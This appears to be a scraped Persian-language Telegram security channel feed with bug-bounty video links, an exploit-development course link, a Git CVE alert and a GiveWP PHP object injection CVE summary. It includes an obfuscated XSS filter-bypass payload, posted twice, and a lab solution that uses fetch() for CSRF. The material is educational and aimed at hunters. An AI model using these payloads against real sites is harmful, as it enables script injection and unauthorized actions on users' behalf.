KALI
⚠️ آسیبپذیری خطرناک در Git (CVE-2025-48384) مرجع هشداردهنده: سازمان امنیت سایبری آمریکا (CISA) هشدار داده که یک باگ جدی در Git بهطور فعال توسط هکرها مورد سوءاستفاده قرار میگیرد. جزئیات باگ: مشکل از نحوهی پردازش کاراکتر Carriage Return (\r) در فایلهای…
😂😂😂بچه ها اپیزود هارو بخونید من اپیزودش رو گذاشتم البته همین کانسپته اینم ولی بای پسه روی اون
🤣1
Forwarded from Bugbountyhints
یه لیست از ویدیو های zseano که آماده کردم ببینمشون :
https://www.youtube.com/watch?v=8Sqp_kryB4E : live recon nahamsec with zseano
https://www.youtube.com/watch?v=-6tv1kvBZDQ : live mentoring 3h
https://www.youtube.com/watch?v=lfdLJIwgyOY : Mindset
https://www.youtube.com/watch?v=8U6bWXDCUjU&t=201s : live hacking on bugbounty notes
https://www.youtube.com/watch?v=jtFlbUUKL1Y : understanding and bypass fileters
https://www.youtube.com/watch?v=0jYeaFmivrY : presentation 1h
https://www.youtube.com/watch?v=fcAklNSta-U : nahamcon 2022
https://www.youtube.com/watch?v=us15nL2Hm2w&pp=ygUGenNlYW5v : staying sane in bugbounty
https://www.youtube.com/watch?v=UH6O13hHf5M : nahamsec with zseano recon,waf,javanoscript
https://www.youtube.com/watch?v=8Sqp_kryB4E : live recon nahamsec with zseano
https://www.youtube.com/watch?v=-6tv1kvBZDQ : live mentoring 3h
https://www.youtube.com/watch?v=lfdLJIwgyOY : Mindset
https://www.youtube.com/watch?v=8U6bWXDCUjU&t=201s : live hacking on bugbounty notes
https://www.youtube.com/watch?v=jtFlbUUKL1Y : understanding and bypass fileters
https://www.youtube.com/watch?v=0jYeaFmivrY : presentation 1h
https://www.youtube.com/watch?v=fcAklNSta-U : nahamcon 2022
https://www.youtube.com/watch?v=us15nL2Hm2w&pp=ygUGenNlYW5v : staying sane in bugbounty
https://www.youtube.com/watch?v=UH6O13hHf5M : nahamsec with zseano recon,waf,javanoscript
❤15🔥1
Forwarded from OS Internals (Abolfazl Kazemi)
📢🐧 مخزن دورهی Linux Exploit Development روی گیتهاب ایجاد شد.
از این به بعد همهی منابع و فایلهای کمکی دوره از طریق این مخزن منتشر میشن.
📂 لینک مخزن:
👉 https://github.com/akazemi67/Linux-Exploit-Development-Course
⚠️ ویدئوها به زبان فارسی هستن و مستندات مخزن به زبان انگلیسی آماده شدن.
#linux #exploitdev #GitHub
از این به بعد همهی منابع و فایلهای کمکی دوره از طریق این مخزن منتشر میشن.
📂 لینک مخزن:
👉 https://github.com/akazemi67/Linux-Exploit-Development-Course
⚠️ ویدئوها به زبان فارسی هستن و مستندات مخزن به زبان انگلیسی آماده شدن.
#linux #exploitdev #GitHub
GitHub
GitHub - akazemi67/Linux-Exploit-Development-Course: This course provides a practical introduction to Linux reverse engineering…
This course provides a practical introduction to Linux reverse engineering and exploitation. You’ll learn how Linux binaries work under the hood, how vulnerabilities arise, and how to discover and ...
🔥3
Forwarded from BugBounty & Hacking Resources (Shopen)
Another XSS Payload:
https://x.com/hoseinshurabi/status/1960794897465926038
{document.body.setAttribute('contenteditable',true)}document.execCommand('insert'+'HTML',false,'<img/'+'src/'+'o'+'nerror=a'+'lert('+'/catfather/)>')https://x.com/hoseinshurabi/status/1960794897465926038
❤8
Forwarded from BugBounty & Hacking Resources (Shopen)
🆘 رفقا اینو میتونید حل کنید:
https://lab.jsecurity.ir/lab2/
راه حل های خلاقانه تون رو میخوام بزارم توی هفته نامه Jsecurity .
داستانش اینه که CSRF توی کلوژر گیرکرده، و شما بایستی اونو بدست بیارید و درخواست بزنید به /update و فلگ رو توی صفحه چاپ کنید.
یه پارامتر q داره که به xss آسیب پذیره.
اپدیت: برای دیدن فلگ هم میتونید پاسخ اینو ببینید
https://lab.jsecurity.ir/lab2/
راه حل های خلاقانه تون رو میخوام بزارم توی هفته نامه Jsecurity .
داستانش اینه که CSRF توی کلوژر گیرکرده، و شما بایستی اونو بدست بیارید و درخواست بزنید به /update و فلگ رو توی صفحه چاپ کنید.
یه پارامتر q داره که به xss آسیب پذیره.
اپدیت: برای دیدن فلگ هم میتونید پاسخ اینو ببینید
await fetch("https://lab.jsecurity.ir/lab2/update", {
"credentials": "include",
"headers": {
"Content-Type": "application/x-www-form-urlencoded",
},
"body": "_csrf=5yuyw85r-R_--IWCQfIFOE68dIE6QWdhrUWg&data=pwned",
"method": "POST",
"mode": "cors"
});👍1
Forwarded from BugBounty & Hacking Resources (Shopen)
Another XSS Payload:
https://x.com/hoseinshurabi/status/1960794897465926038
{document.body.setAttribute('contenteditable',true)}document.execCommand('insert'+'HTML',false,'<img/'+'src/'+'o'+'nerror=a'+'lert('+'/catfather/)>')https://x.com/hoseinshurabi/status/1960794897465926038
Forwarded from SoheilSec (Soheil)
NTLMv1: NTLMv1 is removed starting in Windows 11, version 24H2 and Windows Server 2025.
https://learn.microsoft.com/en-us/windows/whats-new/whats-new-windows-11-version-24h2#features-removed-in-windows-11-version-24h2
https://learn.microsoft.com/en-us/windows/whats-new/whats-new-windows-11-version-24h2#features-removed-in-windows-11-version-24h2
Docs
What's new in Windows 11, version 24H2 for IT pros
Learn more about what's new in Windows 11 version 24H2, including servicing updates, Windows Subsystem for Linux, the latest CSPs, and more.
CVE-2024-12877-week-66.pdf
1002 KB
🎯 CVE-2024-12877 Review – GiveWP goes unserialize()… Hello RCE! ⚡️🔥
Hello hackers, bug hunters, and curious minds! Welcome to Episode 66 of the GO-TO CVE series! 🎙💻
This week we’re cracking open a classic PHP Object Injection inside GiveWP, one of the most popular WordPress donation plugins. 🕳🐘
🔹 Week: 66
🔹 CVE: CVE-2024-12877
🔹 Type: PHP Object Injection
🔹 Target: GiveWP (WordPress Plugin)
📌 What’s the story?
GiveWP uses PHP’s notorious unserialize() on user input. That means attackers can drop in a crafted serialized payload, and PHP will happily invoke magic methods like __wakeup() — executing attacker-controlled logic without warning.
👾 What’s the impact?
Remote Code Execution (RCE) 🚀
Sensitive data theft (donors, users, configs) 🕵️♂️
Privilege escalation across WordPress 🔑
Full server compromise ☠️
💡 Lesson learned: Regex checks won’t save you. The real fix? Never unserialize untrusted input.
📬 Stay tuned with GO-TO CVE for a fresh bug every week:
👉 https://news.1rj.ru/str/GOTOCVE
#week_66
Hello hackers, bug hunters, and curious minds! Welcome to Episode 66 of the GO-TO CVE series! 🎙💻
This week we’re cracking open a classic PHP Object Injection inside GiveWP, one of the most popular WordPress donation plugins. 🕳🐘
🔹 Week: 66
🔹 CVE: CVE-2024-12877
🔹 Type: PHP Object Injection
🔹 Target: GiveWP (WordPress Plugin)
📌 What’s the story?
GiveWP uses PHP’s notorious unserialize() on user input. That means attackers can drop in a crafted serialized payload, and PHP will happily invoke magic methods like __wakeup() — executing attacker-controlled logic without warning.
👾 What’s the impact?
Remote Code Execution (RCE) 🚀
Sensitive data theft (donors, users, configs) 🕵️♂️
Privilege escalation across WordPress 🔑
Full server compromise ☠️
💡 Lesson learned: Regex checks won’t save you. The real fix? Never unserialize untrusted input.
📬 Stay tuned with GO-TO CVE for a fresh bug every week:
👉 https://news.1rj.ru/str/GOTOCVE
#week_66
🔥8❤3👍2👏1
https://news.1rj.ru/str/CVEdb چنل دوم ما رو دنبال کنید عزیزان اگه دوست دارید اپیزود هارو یک جا ببنید
Telegram
CVEdatabase
This channel archive 1️⃣ day exploits and custom exploit for CVE.
👍1